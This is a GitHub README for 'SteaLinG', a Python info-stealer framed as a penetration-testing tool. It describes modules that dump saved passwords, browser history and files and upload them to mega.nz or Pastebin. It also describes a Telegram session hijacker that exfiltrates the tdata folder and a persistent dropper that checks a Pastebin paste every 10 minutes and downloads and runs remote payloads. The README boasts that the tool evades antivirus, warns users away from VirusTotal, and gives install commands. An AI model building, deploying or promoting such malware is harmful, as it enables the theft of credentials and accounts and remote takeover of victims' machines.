The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it
This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes
- you can use it 😂
- for developers
you can read the source code and try to understand how to make a project like this
Due to the closure of anonfiles.com I have modified the code, and it now uploads the results to mega.nz
| module | Short description |
|---|---|
| Dump passwords | steal All passwords saved , upload file a passwords saved to mega -pastebin |
| Dump History | dump browser history upload file a History saved to mega -pastebin |
| dump files | Steal files from the hard drive with the extension you want upload to mega |
| Telegram Session Hijack | Telegram session hijacker upload to Mega |
| Dropper | See below |
| module | Short description |
|---|---|
| 1-Telegram Session Hijack | Telegram session hijacker |
- How it works ?
The recording session in Telegram is stored locally in this particular path
C:\Users<pc name >\AppData\Roaming\Telegram Desktopin the 'tedata' folder
C:
└── Users
├── .AppData
│ └── Roaming
│ └── TelegramDesktop
│ └── tdata
Once you have moved this folder, along with all its contents, to your device in the same path, you will simply need to perform the required action. The tool will take care of everything, and all you need to do is provide your Email and Password on the https://mega.nz/ website. The first step is to navigate to the location of the tdata file, and then convert it to a zip file. If Telegram is functioning correctly, then this error will not occur. If an error does occur, it means that Telegram is open, and you should terminate its processes. You will notice that this behavior is malicious, so I have completely avoided it by using try and except in the code. The name of the archive file is used in the name of the victim's device, because if you have multiple devices, it is possible to differentiate between them. After that, you will submit a request for the zipfile on the mega website using the Email and Password That's all, It is undetected by any AV.
| module |
|---|
| 2- Dropper |
- What requirements does he need from you?
- And how does it work?
- Requirements:
The first thing he asks for is the URL of the virus or whatever you want to download onto the victim's device. Keep in mind that the URL must be direct, meaning that it must be the end of it. Its extension should be
.exeor.png, or any other important extension. The important thing is that thelinkends with a extension(.any extension). The second thing is to obtain theAPI keyfrom you, which you will also provide. You can register and click on the"API"word to find it, and then take note of theusernameandpassword. - So, how does it work?
The first thing to do is to create a private paste on the website. After that, it adds the URL you provided and gives you the executable (exe) file. Its function is to add itself to the device's registry in two different ways when it runs on any device.
First, it opens the Pastebin website and inserts the special paste you created. It then takes the paste URL, downloads its content, and runs it. Additionally, you can enter another URL at any time. This is very normal because the dropper checks the URL every 10 minutes. If it finds a new URL, it downloads its content, connects to it, and continues to run. You don't have to do anything. Therefore, every 10 minutes, you can access your device from anywhere.
3- Linux support
4-You can now choose between Mega or Pastebin
- python >= 3.8 ++ Download Python
- os : Windows
- os : Linux
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.pygit clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python3 -m pip install -r requirements.txt
python SteaLinG.py* Don't Upload in VirusTotal.com Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!
If this tool has been useful for you, feel free to thank me by buying me a coffee :)
